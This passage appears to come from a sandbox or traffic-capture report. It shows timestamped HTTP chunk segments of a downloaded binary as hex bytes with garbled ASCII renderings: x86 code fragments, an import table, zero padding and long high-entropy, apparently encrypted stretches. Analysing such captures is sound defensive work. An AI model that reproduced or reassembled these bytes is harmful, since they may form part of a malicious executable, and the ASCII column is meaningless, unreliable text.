                                                            2022-11-29 23:11:39 UTC24INData Raw: 32 30 30 30 0d 0a 5a 8b 4b 04 3b 4b 08 75 42 bb 00 00 00 80 83 fa 20 73 19 8b ca d3 eb 8d 4c 02 04 f7 d3 21 5c b8 44 fe 09 75 23 8b 4d 08 21 19 eb 1c 8d 4a e0 d3 eb 8d 4c 02 04 f7 d3 21 9c b8 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 5d 0c 8b 53 08 8b 5b 04 8b 4d fc 03 4d f4 89 5a 04 8b 55 0c 8b 5a 04 8b 52 08 89 53 08 89 4d fc 8b d1 c1 fa 04 4a 83 fa 3f 76 03 6a 3f 5a 8b 5d f8 83 e3 01 89 5d f4 0f 85 8f 00 00 00 2b 75 f8 8b 5d f8 c1 fb 04 6a 3f 89 75 0c 4b 5e 3b de 76 02 8b de 03 4d f8 8b d1 c1 fa 04 4a 89 4d fc 3b d6 76 02 8b d6 3b da 74 5e 8b 4d 0c 8b 71 04 3b 71 08 75 3b be 00 00 00 80 83 fb 20 73 17 8b cb d3 ee f7 d6 21 74 b8 44 fe 4c 03 04 75 21 8b 4d 08 21 31 eb 1a 8d 4b e0 d3 ee f7 d6 21 b4 b8 c4 00 00 00 fe 4c 03 04 75 06 8b 4d 08 21 71 04 8b
                                                            Data Ascii: 2000ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJM;v;t^Mq;qu; s!tDLu!M!1K!LuM!q
                                                            2022-11-29 23:11:39 UTC32INData Raw: fa ff ff 83 e8 03
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC32INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC32INData Raw: 32 30 30 30 0d 0a 74 33 0f b6 07 3b 85 78 fe ff ff 0f 85 cc 05 00 00 fe 8d 63 fe ff ff 80 bd 6a fe ff ff 00 0f 85 1c 05 00 00 8b 85 04 fe ff ff 89 85 1c fe ff ff e9 0b 05 00 00 80 bd 73 fe ff ff 00 7e 07 c6 85 62 fe ff ff 01 47 80 3f 5e 8b f7 75 0a 8d 77 01 c6 85 61 fe ff ff ff 6a 20 8d 45 dc 6a 00 50 e8 8c d2 ff ff 83 c4 0c 80 3e 5d 75 09 b2 5d 46 c6 45 e7 20 eb 66 8a 95 2f fe ff ff eb 5e 46 3c 2d 75 42 84 d2 74 3e 8a 0e 80 f9 5d 74 37 46 3a d1 73 04 8a c1 eb 04 8a c2 8a d1 3a d0 77 22 2a c2 fe c0 0f b6 fa 0f b6 d0 8b cf 83 e1 07 8b c7 b3 01 d2 e3 c1 e8 03 8d 44 05 dc 08 18 47 4a 75 e8 32 d2 eb 17 0f b6 c8 8a d0 8b c1 83 e1 07 b3 01 c1 e8 03 d2 e3 8d 44 05 dc 08 18 8a 06 3c 5d 75 9c 84 c0 0f 84 1e 05 00 00 89 b5 48 fe ff ff 8b b5 44 fe ff ff e9 ab fd ff
                                                            Data Ascii: 2000t3;xcjs~bG?^uwaj EjP>]u]FE f/^F<-uBt>]t7F:s:w"*DGJu2D<]uHD
                                                            2022-11-29 23:11:39 UTC40INData Raw: ff 75 f8 56 53 ff
                                                            Data Ascii: uVS
                                                            2022-11-29 23:11:39 UTC40INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC40INData Raw: 32 30 30 30 0d 0a 75 20 ff 15 50 11 40 00 89 45 f8 56 e8 b8 fd ff ff 59 ff 75 f4 e8 af fd ff ff 8b 45 f8 59 e9 59 01 00 00 89 5d f4 89 5d f0 39 5d 08 75 08 8b 06 8b 40 14 89 45 08 39 5d 20 75 08 8b 06 8b 40 04 89 45 20 ff 75 08 e8 8d 2c 00 00 59 89 45 ec 83 f8 ff 75 07 33 c0 e9 21 01 00 00 3b 45 20 0f 84 db 00 00 00 53 53 8d 4d 14 51 ff 75 10 50 ff 75 20 e8 ab 2c 00 00 83 c4 18 89 45 f4 3b c3 74 d4 8b 35 f0 11 40 00 53 53 ff 75 14 50 ff 75 0c ff 75 08 ff d6 89 45 f8 3b c3 75 07 33 f6 e9 b7 00 00 00 7e 3d 83 f8 e0 77 38 83 c0 08 3d 00 04 00 00 77 16 e8 28 2e 00 00 8b fc 3b fb 74 dd c7 07 cc cc 00 00 83 c7 08 eb 1a 50 e8 a1 9a ff ff 59 3b c3 74 09 c7 00 dd dd 00 00 83 c0 08 8b f8 eb 02 33 ff 3b fb 74 b4 ff 75 f8 53 57 e8 ff b1 ff ff 83 c4 0c ff 75 f8 57 ff
                                                            Data Ascii: 2000u P@EVYuEYY]]9]u@E9] u@E u,YEu3!;E SSMQuPu ,E;t5@SSuPuuE;u3~=w8=w(.;tPY;t3;tuSWuW
                                                            2022-11-29 23:11:39 UTC48INData Raw: a8 54 4a 00 e8 21
                                                            Data Ascii: TJ!
                                                            2022-11-29 23:11:39 UTC48INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC48INData Raw: 32 30 30 30 0d 0a 8b ff ff ff 35 a4 54 4a 00 8b f8 89 7d fc e8 11 8b ff ff 8b f0 59 59 3b f7 0f 82 83 00 00 00 8b de 2b df 8d 43 04 83 f8 04 72 77 57 e8 52 11 00 00 8b f8 8d 43 04 59 3b f8 73 48 b8 00 08 00 00 3b f8 73 02 8b c7 03 c7 3b c7 72 0f 50 ff 75 fc e8 0b e4 ff ff 59 59 85 c0 75 16 8d 47 10 3b c7 72 40 50 ff 75 fc e8 f5 e3 ff ff 59 59 85 c0 74 31 c1 fb 02 50 8d 34 98 e8 2c 8a ff ff 59 a3 a8 54 4a 00 ff 75 08 e8 1e 8a ff ff 89 06 83 c6 04 56 e8 13 8a ff ff 59 a3 a4 54 4a 00 8b 45 08 59 eb 02 33 c0 5f 5e 5b c9 c3 8b ff 56 6a 04 6a 20 e8 5f e3 ff ff 8b f0 56 e8 ec 89 ff ff 83 c4 0c a3 a8 54 4a 00 a3 a4 54 4a 00 85 f6 75 05 6a 18 58 5e c3 83 26 00 33 c0 5e c3 6a 0c 68 00 0a 41 00 e8 ee 98 ff ff e8 64 ae ff ff 83 65 fc 00 ff 75 08 e8 f8 fe ff ff 59 89
                                                            Data Ascii: 20005TJ}YY;+CrwWRCY;sH;s;rPuYYuG;r@PuYYt1P4,YTJuVYTJEY3_^[Vjj _VTJTJujX^&3^jhAdeuY
                                                            2022-11-29 23:11:39 UTC56INData Raw: 00 00 00 00 00 00
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC56INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC56INData Raw: 31 66 66 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: 1ff8
                                                            2022-11-29 23:11:39 UTC64INData Raw: 32 30 30 30 0d 0a
                                                            Data Ascii: 2000
                                                            2022-11-29 23:11:39 UTC64INData Raw: 74 12 01 00 8e 12 01 00 a2 12 01 00 ba 12 01 00 ca 12 01 00 d4 12 01 00 ee 12 01 00 00 13 01 00 22 13 01 00 34 13 01 00 40 13 01 00 52 13 01 00 38 0d 01 00 58 10 01 00 28 0d 01 00 c6 17 01 00 be 13 01 00 ce 13 01 00 e4 13 01 00 f2 13 01 00 fe 13 01 00 0a 14 01 00 26 14 01 00 44 14 01 00 52 14 01 00 64 14 01 00 70 14 01 00 88 14 01 00 92 14 01 00 9e 14 01 00 b0 14 01 00 be 14 01 00 ca 14 01 00 d8 14 01 00 e2 14 01 00 f2 14 01 00 08 15 01 00 1c 15 01 00 30 15 01 00 44 15 01 00 5c 15 01 00 74 15 01 00 8c 15 01 00 9a 15 01 00 a8 15 01 00 b0 15 01 00 be 15 01 00 ca 15 01 00 da 15 01 00 f0 15 01 00 0a 16 01 00 22 16 01 00 3c 16 01 00 4e 16 01 00 5c 16 01 00 76 16 01 00 8c 16 01 00 a6 16 01 00 b6 16 01 00 cc 16 01 00 dc 16 01 00 ee 16 01 00 00 17 01 00 12 17 01
                                                            Data Ascii: t"4@R8X(&DRdp0D\t"<N\v
                                                            2022-11-29 23:11:39 UTC72INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC72INData Raw: 32 30 30 30 0d 0a 7f 3e 64 d1 42 41 04 27 50 3a be 83 99 53 e7 78 67 9b 9a 94 cd 9d 5c 46 ba a9 cb 39 06 59 38 cf 2f 17 3d a6 8d 95 64 22 81 61 eb a1 67 d7 a3 f6 94 23 d9 54 3f 1a b7 db c4 02 19 6c 53 25 bc c6 31 79 17 5d 4c 8b 86 5f 4f 87 28 dd 1e 14 07 4d f9 a2 47 5f 71 39 04 dc e7 6c 74 a4 a6 43 56 28 e1 48 8a f0 b8 5c 68 94 55 4c 0d 83 eb c2 df 4a 51 aa 0b ed 35 a2 c9 b9 e9 a6 55 51 ed 88 3c c9 b3 c5 f1 bb f3 34 bc 94 fc f6 93 fa 8f 78 a1 79 cb fa 42 38 28 ff 27 c5 39 b6 ce a7 2b 1d eb ac ef 05 74 6a 5e 73 dd 20 f1 78 f8 59 66 f8 4a e4 89 3a f2 4a c5 4c ef 59 d1 c9 a7 b7 6b fc ca 38 a8 83 3c 94 ab 06 3f f6 2f 8c 8d 76 6f 9f 98 6b b0 70 b1 68 30 bf 13 40 44 90 46 a7 29 6d 5c 22 38 61 85 5c 28 1d 5c bd ee 90 4b 90 0b 36 f4 b4 2d 0f 92 28 eb f3 19 9b ee
                                                            Data Ascii: 2000>dBA'P:Sxg\F9Y8/=d"ag#T?lS%1y]L_O(MG_q9ltCV(H\hULJQ5UQ<4xyB8('9+tj^s xYfJ:JLYk8<?/vokph0@DF)m\"8a\(\K6-(
                                                            2022-11-29 23:11:39 UTC80INData Raw: 23 57 b6 de 5d f7
                                                            Data Ascii: #W]
                                                            2022-11-29 23:11:39 UTC80INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC80INData Raw: 32 30 30 30 0d 0a 92 e5 fb 51 05 88 2b a3 41 c7 4c 86 03 fb c8 69 50 e5 d3 c4 98 5d 1c e4 7e 4b 26 c1 d8 a7 c0 15 96 bd 00 72 d3 44 8f 1f 88 7a 79 27 1a 2b 53 9a 57 ca 7e 57 75 8c a9 35 5d 64 ff f5 d0 f9 22 0b 71 69 ac d4 fa 02 ce c4 30 20 5f cb ba 5b 10 a3 f3 ea 29 0e 0b bf e5 29 87 4b 04 d7 4a b6 78 85 95 11 47 9e 41 b6 e9 e3 23 ba 25 12 88 33 29 81 68 47 69 7e a6 f0 81 8a fc a6 fd a3 69 fc b1 63 87 e2 c8 62 fe b5 91 83 4a ab 20 d8 6f 86 e8 d7 eb 85 be 2b 7f 3b 4a b1 6d 20 3e 20 a6 f7 b5 6e dc 50 b1 5a 26 35 fc 67 4b b4 e9 66 8a ae b7 e7 7f bb 9f 35 27 a3 db b8 a0 e3 f5 f4 e9 ad 5d b8 94 18 eb cd 43 cd eb 1a 11 e2 c5 4f ee 30 3d 2f e3 9e 4a 8e dc 06 f0 32 f4 b7 ab f5 8e 71 b2 15 b6 92 24 e6 8f 75 d4 00 24 b1 5f 78 7e 1b af 86 c8 eb 50 c8 f8 ed 1b 45 61
                                                            Data Ascii: 2000Q+ALiP]~K&rDzy'+SW~Wu5]d"qi0 _[))KJxGA#%3)hGi~icbJ o+;Jm > nPZ&5gKf5']CO0=/J2q$u$_x~PEa
                                                            2022-11-29 23:11:39 UTC88INData Raw: 63 50 8e 95 54 2a
                                                            Data Ascii: cPT*
                                                            2022-11-29 23:11:39 UTC88INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC88INData Raw: 32 30 30 30 0d 0a 9a a8 14 b3 ef 19 0e ef 0e ef 00 9d b0 36 5f 7d 8b 1f b6 cd a9 e4 eb 43 f7 ac 95 07 51 bf 47 de 2d 0b 0b ec 32 d5 46 91 75 e3 46 14 16 4b a7 ab 76 b0 f4 dc dc 5a 4c 58 72 90 cc 99 ab 43 70 02 7e e1 7d c4 21 66 e4 6d 10 3d e2 cf 68 fa 97 c2 5e f7 e5 39 ff 42 48 64 e7 ac 97 9b be 96 60 d5 f6 a6 e5 51 e6 73 b5 6e ba 32 75 86 d9 db 4d 5a 9c f2 74 9e 99 79 ba 7a b5 ce eb e5 ea 4e 31 4d 7b 57 42 0f 8d 30 ab 99 6f 6c 4d 11 a4 a0 77 3a 24 b1 45 75 cf 61 55 f7 7d 61 e4 0b 65 b9 86 ce 4d 7a 9f a1 f8 8e d7 43 2f 7e 4f 18 83 68 84 39 0b 4c 0d 81 be 72 4b a7 ec d4 9a 35 8c 1a 4e 7e 7b 7e e3 37 98 c7 8f 4c d1 1d 43 e6 30 45 e8 a4 4b 12 f3 0a 86 fb af d0 31 cc 65 da a7 c6 a2 17 02 ad 1a 2b 68 cb 87 79 23 a1 24 56 ee 78 b6 ba 5a 17 08 c3 ef 3d 59 aa 71
                                                            Data Ascii: 20006_}CQG-2FuFKvZLXrCp~}!fm=h^9BHd`Qsn2uMZtyzN1M{WB0olMw:$EuaU}aeMzC/~Oh9LrK5N~{~7LC0EK1e+hy#$VxZ=Yq
                                                            2022-11-29 23:11:39 UTC96INData Raw: 90 0f 93 c9 da 16
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC96INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC96INData Raw: 32 30 30 30 0d 0a 04 3d 91 55 d2 11 9e ae 0b 7a 7b 0d 37 71 98 8a 3a 70 04 df 70 5f 09 02 a9 38 37 88 91 d7 50 90 07 4f fd 36 6f 8e 3e d8 43 c5 52 ba 14 0c b8 ec 70 f5 07 aa b5 81 fb 3c b1 1a e8 7c 49 42 ca a1 f3 89 84 fe 3b 59 51 8e b5 73 83 05 7c b3 e4 a7 b2 62 9e a8 b0 75 28 ae 67 af 8d cc 70 de e0 e3 a5 6a 8a d7 0c ec cd 8f ae c6 89 6b 53 fb f5 da d2 04 49 6a 5e 9d 06 24 3f 31 31 06 10 1f 84 ca ee 0b 88 9d d4 c5 b5 8d 05 f6 77 a1 d6 9e 4e 6a 25 bb a0 12 37 6b ab 44 e8 f0 63 42 5a b7 dc 57 78 1c de d0 56 b5 84 0c c9 c3 b0 d7 27 b9 82 a1 c6 df f5 c6 42 c5 c6 83 f6 87 06 79 bc a0 a3 f4 c1 14 65 fd 05 31 b3 53 d7 85 d1 ca 11 ba a5 01 7a 17 a5 e4 bf 0a b0 69 2d 66 dc 6b 91 ab 4e 4c 41 4f 8f bc 60 07 3b b4 30 ed c8 54 55 e2 76 95 ef 6b 07 8e d9 9f 60 3b e7
                                                            Data Ascii: 2000=Uz{7q:pp_87PO6o>CRp<|IB;YQs|bu(gpjkSIj^$?11wNj%7kDcBZWxV'Bye1Szi-fkNLAO`;0TUvk`;
                                                            2022-11-29 23:11:39 UTC104INData Raw: ea 1b 13 9d 7d f2
                                                            Data Ascii: }
                                                            2022-11-29 23:11:39 UTC104INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC104INData Raw: 32 30 30 30 0d 0a 74 e2 9a cc a7 4c 5a 90 e5 1c d6 de 08 27 e9 4c 7d ff f6 72 a5 c4 0d c4 a1 b1 18 07 4d 28 90 41 f7 9d 86 84 a5 c7 38 bb d2 92 ff 32 fa 4b eb 81 33 25 07 3c 01 59 9f 0e 46 01 93 a0 46 fe 28 c1 97 ea d8 38 32 6c a3 67 33 e8 de cd b8 26 e3 f3 8e b3 af 8d 5a 7c 47 e2 30 4d 5d 89 36 26 e8 8f 85 68 70 1f 84 eb bf d5 13 f9 db 46 0f 28 a3 6a 4e 3b 94 d1 88 f4 52 47 62 63 ea 92 d4 e6 fb 54 14 68 95 25 a1 49 5c 79 55 6a 30 13 56 b7 21 d4 11 a4 32 3b 72 68 4e 4a e9 b6 ff 33 f0 2d 3e 17 37 90 41 62 da c7 c4 d2 90 49 db 08 9b 7f 86 71 9b f0 16 36 fd 50 dd fa 36 de 16 50 2c 8b b8 45 01 da 59 b2 5b fb 12 02 f8 67 37 39 fd e6 b3 51 22 f4 68 c2 4d d9 15 0a db 95 8f 52 2c 97 81 32 c8 54 cd 7f 76 93 29 3d a7 aa 8d 3d 89 f8 08 9f dc 78 df a7 46 b9 0c 3c 67
                                                            Data Ascii: 2000tLZ'L}rM(A82K3%<YFF(82lg3&Z|G0M]6&hpF(jN;RGbcTh%I\yUj0V!2;rhNJ3->7AbIq6P6P,EY[g79Q"hMR,2Tv)==xF<g
                                                            2022-11-29 23:11:39 UTC112INData Raw: fa 20 51 c2 b5 a7
                                                            Data Ascii: Q
                                                            2022-11-29 23:11:39 UTC112INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC112INData Raw: 32 30 30 30 0d 0a 4d ed ac b4 54 0c 86 78 2e cc 8e a0 25 f3 b0 a2 ed 0f 20 8f 33 3b f8 f1 38 fc 8b c9 cd a6 13 23 61 4a 25 f6 a2 7b 98 0a 8e f7 63 a7 89 97 7a f3 22 68 87 bc 91 6d 59 c4 96 79 e6 4e 33 0f 32 a5 d3 14 df 5b f6 e8 b2 52 e1 8c 84 2c b5 61 84 4f b7 6c 3a 18 f1 aa 3d 6f 8a 0e 5f ce 24 82 14 eb f6 59 67 4f 37 5b eb c6 18 b0 9d 64 da e9 2d f2 d8 e8 ce 4a fa 15 58 a7 9b c4 76 ff d4 89 40 45 dd 85 cb e5 f7 07 b1 3a 74 ee 6d bc c4 80 17 6c 97 e7 30 67 e6 79 c3 48 ba 8a 44 c4 6d f5 74 85 e1 b0 53 a8 03 43 5d 13 b0 94 83 be c5 de 4a c2 d1 47 fc d0 c6 6c 20 ac ea 5e d4 5f 20 e1 75 4d 70 cd 95 f1 18 a9 37 ed 1e d5 e0 d8 e9 00 73 64 33 73 f3 8b 1f 19 24 2e 11 e5 fe 8f b7 6a 95 04 1c dd 88 2d f9 3d cd 72 23 a3 6b 52 93 19 ac b6 a8 ba f0 e1 56 7b a4 e1 19
                                                            Data Ascii: 2000MTx.% 3;8#aJ%{cz"hmYyN32[R,aOl:=o_$YgO7[d-JXv@E:tml0gyHDmtSC]JGl ^_ uMp7sd3s$.j-=r#kRV{
                                                            2022-11-29 23:11:39 UTC120INData Raw: bf df 6a 42 1d 1b
                                                            Data Ascii: jB
                                                            2022-11-29 23:11:39 UTC120INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC120INData Raw: 31 66 66 38 0d 0a 2e aa be f5 74 7a 4c a3 f3 0b 6a 3e fe c5 14 bc 25 19 5d 12 7e bb b9 32 51 36 20 d4 18 2f a3 e8 d8 b7 b2 98 05 60 1f 62 e9 50 4f f6 28 0f af 9e 9c 60 0b 98 c3 e6 e4 fb c7 a3 80 37 f4 ae af dc b7 c6 54 37 3c 6d 8c 79 e4 2a e1 7a d2 bd 9b 9a 07 76 d3 4d 7f 0a f9 0e 11 09 a0 81 c5 31 8f b0 93 5f 8c bc 5e 10 15 8a d3 a5 de 62 7b 93 4a 4a 06 65 25 d5 2f 2a 6e 1e 5f cd f4 b1 ad f6 4b fb 1f e1 60 ee 80 6c 9e 1a a1 dd c2 b8 9d 8f b1 71 c6 75 88 d8 67 da 4f f3 c2 f5 05 0b 67 a4 ff 6e 06 05 01 bf b6 64 26 22 96 2f a4 4e e7 8a 4d 48 d3 1e 73 a2 7b 38 9e c8 ec b7 40 60 0d f0 54 f5 6d bf 73 d9 1d f5 31 64 69 0c c7 d3 71 d3 e1 8b f0 7d d1 2d 37 07 6e 36 20 90 bb b0 6e cf 3b d7 a8 ce d5 fd 95 c6 c9 03 46 d7 2a 99 34 bb 93 45 38 a4 94 c7 26 dc 32 ae 9c
                                                            Data Ascii: 1ff8.tzLj>%]~2Q6 /`bPO(`7T7<my*zvM1_^b{JJe%/*n_K`lqugOgnd&"/NMHs{8@`Tms1diq}-7n6 n;F*4E8&2
                                                            2022-11-29 23:11:39 UTC128INData Raw: 32 30 30 30 0d 0a
                                                            Data Ascii: 2000
                                                            2022-11-29 23:11:39 UTC128INData Raw: 8f f7 da 0d 50 a1 99 99 e6 c5 dd 5f 32 ca 67 65 1b e2 1f 75 2b c3 46 77 c3 27 8f f1 08 86 2f 8a ce 18 d8 2e 1e 93 d0 c3 e9 fc 3b 02 5c 4b ea f9 25 a1 35 36 c2 28 29 16 e1 81 aa 7a 9a d7 04 eb 9f 0f 00 bf 07 1b 91 33 47 c7 ca 4d de b1 75 c5 49 c8 36 bc 61 63 aa 30 35 1b 5c b0 28 2b 64 bc 05 bb 9d b4 1a 4e 28 77 12 15 77 10 70 85 7e 6d 0b 08 22 cb 56 19 f0 f3 ec 9a c9 ed 8f 41 48 93 72 c1 ba bf 3d 4b 14 d3 ab bd 9f 2c 05 2e 64 71 2c 4a 97 27 d4 f9 a0 c0 7b cb fe 84 74 aa 78 37 d1 d8 8b 47 cd 75 44 1d 34 84 10 3d db 3f 90 1e 91 ab e9 22 8d 6d e4 df 5e 13 15 01 94 b6 7d d2 d0 c5 75 3a 72 26 51 3b e5 4b 14 c9 12 ed 61 ac 1f d6 c0 a7 8f 9c b4 38 09 44 91 b9 ee 50 27 96 75 3c 24 b4 bb ab 93 80 bf ed e6 26 0e 4b 8f 01 f8 60 3a 31 ad c9 f4 e6 67 ff fc 79 6c 1e 5f
                                                            Data Ascii: P_2geu+Fw'/.;\K%56()z3GMuI6ac05\(+dN(wwp~m"VAHr=K,.dq,J'{tx7GuD4=?"m^}u:r&Q;Ka8DP'u<$&K`:1gyl_
                                                            2022-11-29 23:11:39 UTC136INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC136INData Raw: 32 30 30 30 0d 0a 25 86 07 4a ed 4a 43 96 73 f1 26 fd a0 b1 04 0a 29 20 29 47 dd d8 92 2b d4 8e 82 25 7d a5 3b bb f5 81 b9 ed c5 59 23 55 6f 7d 28 7a 22 cb db d7 a1 f7 9e 48 87 1c 08 8c 73 51 83 31 1f a9 99 ce ad 30 3a 66 6e f1 9b ce 7d 0e 39 97 f2 b4 23 c8 73 ee 7f 7e fb cd 8d 6b 4c 43 69 66 68 4e 50 3a 32 e3 77 8c 97 f7 6f 3f 3f db 0a 7d c5 6c fc 87 21 ae 86 d2 b2 8e 66 89 3e f6 34 cc 8a b5 df ba 95 47 b5 05 55 85 96 27 a7 5c 50 be 6d 2d 6b 42 7b a2 0a 7c 03 3b a4 4c 00 16 78 c6 4c f6 4f c4 41 90 2d 14 c3 a3 a3 39 71 14 65 9a ac 44 c4 a9 e0 d3 dc fa 7f b1 ca 6e f3 30 60 19 04 d4 92 2e c9 97 ff f5 aa 46 dc 40 89 b7 29 5d d3 bf 40 9f 8c 0b f5 f7 b5 06 4e 61 a7 d7 44 d7 37 c0 7c 9c 70 10 b5 77 f1 8b cb 7c 51 e5 e5 fc 4a 00 eb f0 ef aa 90 6e aa a2 46 83 fa
                                                            Data Ascii: 2000%JJCs&) )G+%};Y#Uo}(z"HsQ10:fn}9#s~kLCifhNP:2wo??}l!f>4GU'\Pm-kB{|;LxLOA-9qeDn0`.F@)]@NaD7|pw|QJnF
                                                            2022-11-29 23:11:39 UTC144INData Raw: 51 e2 b9 d8 50 6b
                                                            Data Ascii: QPk
                                                            2022-11-29 23:11:39 UTC144INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC144INData Raw: 32 30 30 30 0d 0a e1 99 ee 15 be 15 0a e4 44 c8 a1 6a ac 80 6f 7a 07 0e 65 48 cc c3 d5 b7 70 45 ed 0a 73 79 72 e8 84 ad 3e 2b bc ef 81 04 a3 50 61 5c e7 e5 4b ab 20 d8 9f 5d bd be c9 10 0d 4a 2c 69 fd 12 cf 91 a2 5d 39 93 b0 fd 45 7e aa e4 82 14 05 1e e9 fc 53 42 6a 41 f6 c8 b4 61 05 82 da 78 40 e6 5a 87 fa 60 00 0d 91 b6 3e 2c 14 70 f9 7f f4 af 07 e0 d1 94 fc 0a ab 32 de aa 99 e2 7d a1 63 d3 33 96 c8 59 e5 90 02 77 85 f0 e6 81 98 ee a0 02 23 a1 b6 f0 0e 97 9b 7c 2c c0 95 43 fd d0 85 f5 72 bf 29 83 e4 29 ee af 61 2c 18 29 77 08 20 25 9c d6 6e 65 bc 73 6a 5d 7f b6 ca fb 87 ef 96 10 df 79 94 23 92 36 a4 48 70 e3 3c 21 d8 40 92 5b a4 2c e2 27 2b 67 75 56 16 8e 1e 6c fa 90 b2 9e eb 68 0f 96 11 e6 de 4b 03 87 8c 39 23 a2 08 3d 3f af 30 bc 11 39 b9 d9 4d c8 fb
                                                            Data Ascii: 2000DjozeHpEsyr>+Pa\K ]J,i]9E~SBjAax@Z`>,p2}c3Yw#|,Cr))a,)w %nesj]y#6Hp<!@[,'+guVlhK9#=?09M
                                                            2022-11-29 23:11:39 UTC152INData Raw: b1 33 2d 9b 0c 71
                                                            Data Ascii: 3-q
                                                            2022-11-29 23:11:39 UTC152INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC152INData Raw: 32 30 30 30 0d 0a cb 95 e3 02 2c e1 9d 8b d5 95 f9 f8 a8 f3 93 e9 b8 06 99 17 a0 1c c7 73 86 e8 7f 84 7a dc 03 b4 49 0a f1 83 70 cd ae 08 25 f0 5d c3 90 4c e2 13 e6 47 13 cd 87 f6 ee 48 7a 41 58 02 af 44 d8 95 c9 d1 2b c1 80 fd 1f 55 54 3d 13 5d be 3c 2b 02 e3 db 06 04 d0 01 9a f8 3a 10 95 5e d4 47 ba 05 79 92 49 5a c6 76 72 cf 07 52 1f e0 76 69 e4 34 05 6c 4d bb ff 2e 8f 0f d8 48 c7 72 54 92 0d 07 64 e4 e7 95 e2 15 0c 02 1c c7 6b 36 0a 81 4b e7 ef f4 3c 45 ff a9 44 10 2a bd 36 89 24 12 25 e2 f8 ba ae 49 93 1d fe 69 a9 bd 3c 88 6f 1b 7f ea 95 00 29 6b a6 9d dc f9 ce c7 f1 68 6e b0 58 85 8a 59 39 c0 4e 50 a5 52 da 62 73 11 50 4e 48 e5 ff 11 76 28 6a 1b 08 80 f6 e2 ba 85 3e d2 2b c7 19 4e 28 1d e8 01 c7 00 e6 ab 6c 53 2d 06 58 2d 79 3e 5b d8 ec 22 4d 0d 11
                                                            Data Ascii: 2000,szIp%]LGHzAXD+UT=]<+:^GyIZvrRvi4lM.HrTdk6K<ED*6$%Ii<o)khnXY9NPRbsPNHv(j>+N(lS-X-y>["M
                                                            2022-11-29 23:11:39 UTC160INData Raw: 00 fc 1c 53 28 68
                                                            Data Ascii: S(h
                                                            2022-11-29 23:11:39 UTC160INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC160INData Raw: 32 30 30 30 0d 0a ac 19 de e5 2d fa 00 60 72 e5 9f 08 c6 3a 53 71 06 cf 63 ec 11 56 ca 2c 29 48 c4 93 04 b5 0a 0c 14 20 67 d2 e4 61 82 f8 67 e3 f9 81 c8 61 71 93 7d ed b6 da 7e 1a 9a 1c 9d 0d 10 90 ac f5 10 b2 a3 26 e6 ee 55 4b de ea 20 fd 90 ab fd 17 5c 05 a2 dd 87 d8 a9 ee b9 52 a1 20 d4 a3 90 a0 b4 35 d8 e3 86 f5 73 51 b4 ab 73 b3 c1 62 73 bb 2c 8d e4 74 03 1a b9 28 c5 ca 71 22 67 5a ad 42 9f ad 15 58 2b d5 8c 18 57 5d 9b 7e 19 b0 cc aa 77 df bd 5c dd 81 47 20 7f f0 01 fa ea 92 1b 10 b5 8d 40 0e 95 2f 10 0c f7 54 10 f7 72 1e 40 e6 b2 37 99 ee 0b 16 1b 3a 7a f4 6a 0e 40 45 91 7c 26 de 32 96 fc e9 48 9b 7d e5 8c 80 7c dd 49 ec 37 05 91 3f 15 77 b1 32 46 40 73 9b 94 b7 48 aa 9a dd 93 b2 92 f4 eb 8e a3 1a 44 ac 74 24 5c e3 bc 61 26 9c e7 8b b1 1e 57 9a c8
                                                            Data Ascii: 2000-`r:SqcV,)H gagaq}~&UK \R 5sQsbs,t(q"gZBX+W]~w\G @/Tr@7:zj@E|&2H}|I7?w2F@sHDt$\a&W
                                                            2022-11-29 23:11:39 UTC168INData Raw: ad 2b ba 74 6a 9c
                                                            Data Ascii: +tj
                                                            2022-11-29 23:11:39 UTC168INData Raw: 0d 0a
                                                            Data Ascii:
